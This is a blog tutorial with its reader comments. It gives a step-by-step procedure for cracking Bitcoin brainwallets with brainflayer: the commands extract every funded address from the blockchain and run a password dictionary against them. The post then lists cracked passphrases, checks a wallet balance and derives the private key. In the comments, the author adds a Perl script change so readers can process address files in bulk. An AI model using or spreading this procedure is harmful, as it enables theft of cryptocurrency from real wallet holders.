Bitcoin Brainwallet Cracking Tools

Introduction:
New Cracking Tool Exposes Major Flaw in Bitcoin Brainwallets
http://www.coindesk.com/new-cracking-tool-exposes-major-flaw-in-bitcoin-brainwallets/

Download brainflayer: https://github.com/ryancdotorg/brainflayer

1. Password dictionary
Download CrackStation dictionary: https://crackstation.net/buy-crackstation-wordlist-password-cracking-dictionary.htm

2. Install Bitcoin Daemon: https://github.com/bitcoin/bitcoin

3. Open source blockchain tool Blockparser
Blockparser download: https://github.com/znort987/blockparser
Retrieve all Bitcoin addresses using Blockparser

./parser allBalances > allBalances.txt

awk '{ print $2 }' allBalances.txt > btcaddress.hex

4. Convert Bitcoin address to Hash160 address
Tool written in Perl: http://lenschulwitz.com/base58
A slight change is needed to convert text file.

5. Convert Hash160 address to bloom filter address using hex2blf

hex2blf btcaddress.hex btcaddress.blf

6. Run brainflayer

brainflayer -b btcaddress.blf -i password.txt

7. Sample output: (first column is Bitcoin Hash160 address, the last column is the password)

6e24b1342852a8e4af3c63206f8b2266ba887ef6:u:str:1234
ec42ad7fd54f931274b83f6137379206e458b106:u:str:1satoshi

long numeric passwords:

09b508bae503da42f05575891866d0072bcf65f6:u:str:011235813213455
32f6ace81715e0872e6db7ff4a280185205620a3:u:str:12345678901234567890
afe66e0314eb15a5cd01d95b94166ce995c3347d:u:str:000000000000000000000000000000

long alphabet passwords:

482bc0946efa74a5a3d005e693b2774e1aeb7dad:u:str:qwertyuiopasdfghjklzxcvbnm
4b1b231e9caa7f95d51ed7c99df68a5add5a1714:u:str:doandroidsdreamofelectricsheep
bf1f119153f6ecedb259f0043f9fbbc88687b22e:u:str:thepastisagrotesqueanimal

passwords made of sentences

ac8dc3fcfa4e9e91dddfc0c3fe6d7e0021292036:u:str:may the force be with you
8b0a993126c3bf8f4b28c8264b553d6aa39f2956:u:str:Money is the root of all evil.
1622dc9d9e5423d7b84122f9ef7edfa1981d9960:u:str:nothing ventured nothing gained
0c7cdc2d447af8d422dd2b54cab2f274ca88131d:u:str:No one can make you feel inferior without your consent.
8ee2d47121c480c37f9dd0a88bddf2dc21b284da:u:str:The quick brown fox jumped over the lazy dog.
2029758fa9d81f9c36f4be2ab8696ad10fc602f8:u:str:The quick brown fox jumps over the lazy dog
838edc90c250d298fc115bf028164f105e228fb9:u:str:these aren't the droids you're looking for
8c4cfbd55dd01f6c221372eba1e57c7496d7239f:u:str:This is the way the world ends.
31ae15fc484cf5fd34ecd49e1afb51e3f2174a93:u:str:tomb-of-the-unknown-soldier-identification-badge

passwords in Chinese character

7afa3b687e58d3f16feccb8244b90a87a535b85c:u:str:试试看
73b1bebd338fc051dba7282d4f99846fac01df23:u:str:中国上海

8. Convert Hash160 address back to Bitcoin address
ec42ad7fd54f931274b83f6137379206e458b106:u:str:1satoshi
Convert to bitcoin address: 1NYEM85RpgkSofLqDfwjb21o3MD4ibSo49,
Brainwallet password is 1satoshi

9. Bitcoin wallet balance
check Bitcoin balance on Blockchain.info

https://blockchain.info/q/addressbalance/1NYEM85RpgkSofLqDfwjb21o3MD4ibSo49

10. Private key for the Bitcoin address
Download open source tool Addressgen: https://github.com/sarchar/addressgen

Example: ec42ad7fd54f931274b83f6137379206e458b106:u:str:1satoshi
Bitcoin address: 1NYEM85RpgkSofLqDfwjb21o3MD4ibSo49

Run

./genaddress.py -p 1satoshi

Output:

ECDSA private key (random number / secret exponent)
51b2156ca4b9d96c9e77938b1197b806a4a2822060da15d79f2f6f8f75655644
Bitcoin private key (Base58Check, uncompressed)
5JSGPQ2Jw1P5cVi2L8LeuWnMF5H8rLGrPPgVM2XE1cahG1BQDzY
Bitcoin extended private key (Base58Check)
xprv9s21ZrQH143K3TEjPXq1CkrNDMfYWYwVNKVWqSPeEthWqd4uJKWSRnM2GX2BYktMDQrGxa2FZrpDdt5Q1qeLk4T46974eh9Eo7iHCfGcY37
(embedded private key) -> L43jHnozmKE5TYNqMwsPgXNcTfRT7TNhzDkTgaKAgYcx99Qm5LhB
------
ECDSA public key (uncompressed)
04a3599acf74fc7b781207860e8753f182fc4b8c5febe6c5f2e09381893abb4e0b290a172aa6a7ba13c5a32de6d10a024d95cf786d72e650889a4a22f29a3b84df
Bitcoin Address (uncompressed, length=34):
1NYEM85RpgkSofLqDfwjb21o3MD4ibSo49
Bitcoin extended public key
xpub661MyMwAqRbcFwKCVZN1Zto6mPW2v1fLjYR7dpoFoEEViRQ3qrpgyafW7nhb8fPtRaX2TJbCXQAfgAhMYGJ9DJeF1UVAMYu3Ucd3BqaeU9R
(embedded public key) -> 032131be64ba3f27e757c2f0f310038a8dfb768ff922448aff2841fa7954472880
(bitcoin address) -> 1Kvdg9jcdcdWGBb77Rovd8jkHjPd4eKB6t

As you can see above, the bitcoin address is 1NYEM85RpgkSofLqDfwjb21o3MD4ibSo49
the private key is 5JSGPQ2Jw1P5cVi2L8LeuWnMF5H8rLGrPPgVM2XE1cahG1BQDzY



  • Facebook
  • LinkedIn
  • Twitter
  • Google Plus
  • Delicious
  • Digg
  • Add to favorites
  • RSS
  • Email

11 thoughts on “Bitcoin Brainwallet Cracking Tools

  • Monday July 25th, 2016 at 09:54
    Permalink

    i need a more in depth tutorial on how to do this step by step properly Thanks if you can send me one by email please

    Reply
  • Saturday July 30th, 2016 at 16:43
    Permalink

    Hi pal great tut dose this still work would love to give it a shot

    Reply
  • Thursday September 22nd, 2016 at 03:24
    Permalink

    Hi,

    Great article,!

    I have one problem though, at step 4, since i am not a developer, i am having a hard time figuring out what change to do to make it process a whole file. I am using a csv file which was generated by another blockparser (not znort’s) and it only outputs addresses in Base58.

    How could I convert them all in one go to hex format?

    Thanks in advance!

    Reply
    • Thursday September 22nd, 2016 at 15:46
      Permalink

      Download the Perl script from: http://lenschulwitz.com/b58/base58perl.txt
      rename it to base58perl.pl

      replace the last part of the script from:

      #Sample test taken from https://en.bitcoin.it/wiki/Technical_background_of_version_1_Bitcoin_addresses.
      my $base58_encoded_address = "16UwLL9Risc3QfPqBUvKofHmBQ7wMtjvM";
      print "\nRunning tests for bitcoin address $base58_encoded_address\n";
      print "Bitcoin address is valid.  Address type: '", check_bitcoin_address($base58_encoded_address), "'.\n";
      my $binary_address = decodebase58tohex($base58_encoded_address);
      print "Binary hexadecimal representation is: $binary_address\n";
      my $reencoded_base58 = encodebase58fromhex($binary_address);
      print "Re-encoded back to Base58 is: $reencoded_base58\n\n";

      to:

      my $fileSrc = 'base58.txt';
      open my $fhSrc, $fileSrc or die "Could not open $fileSrc: $!";
      
      my $fileDest = 'hex.txt';
      open(my $fhDest, '>>', $fileDest) or die "Could not open file $fileDest: $!";
      
      while( my $base58_encoded_address = <$fhSrc>)  {   
        my $binary_address = decodebase58tohex($base58_encoded_address);
        say $fhDest $binary_address;
      }
      
      close $fhSrc;
      close $fhDest;
      

      This should read base58 address from base58.txt and save the hex format address to hex.txt.

      Reply
      • Thursday September 22nd, 2016 at 15:54
        Permalink

        Awesome, it worked!

        Thank you!

        Reply
  • Sunday September 25th, 2016 at 17:18
    Permalink

    hopefully someone can make a full detail on how to make this work in linux.

    Reply
    • Sunday September 25th, 2016 at 17:19
      Permalink

      a tutorial i mean 🙂

      Reply
  • Wednesday November 9th, 2016 at 16:25
    Permalink

    how long does it take for you to get output from brainflayer? I have completed up to step #7 but now it appears brainflayer is either working in the background or doing nothing???

    I can make video tut if Jack doesn’t mind. I cant explain much of background processes as I usually compile and pack all data tightly and quickly to script it.

    Reply
    • Sunday November 13th, 2016 at 21:58
      Permalink

      use a known password for testing and you should see the output in one second.

      A video tutorial would be great. You can post the link here.

      Reply

Leave a Reply

Your email address will not be published. Required fields are marked *